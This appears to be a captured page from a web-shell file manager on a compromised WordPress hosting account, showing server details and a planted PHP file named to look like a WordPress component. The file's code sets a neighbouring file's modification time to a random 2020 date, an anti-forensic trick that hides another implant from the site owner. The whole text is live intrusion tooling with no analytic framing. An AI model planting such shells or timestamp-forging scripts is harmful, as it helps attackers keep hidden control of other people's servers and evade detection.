HEX
Server: Apache/2.4.63 (Unix)
System: Linux geist.beget.ru 5.10.258-0-beget-acl #1 SMP Mon Jun 8 11:35:04 UTC 2026 x86_64
User: trofimt8 (2601)
PHP: 8.2.28
Disabled: NONE
Upload Files
File: /home/t/trofimt8/uborka-21.ru/public_html/wp-touch-class.php
<?php
$f = dirname(__FILE__) . '/links-xml.php';
if (is_file($f)) {
    $ts = mktime(mt_rand(0,23), mt_rand(0,59), mt_rand(0,59), mt_rand(1,12), mt_rand(1,28), 2020);
    @touch($f, $ts, $ts);
    echo '1';
} else {
    echo '0';
}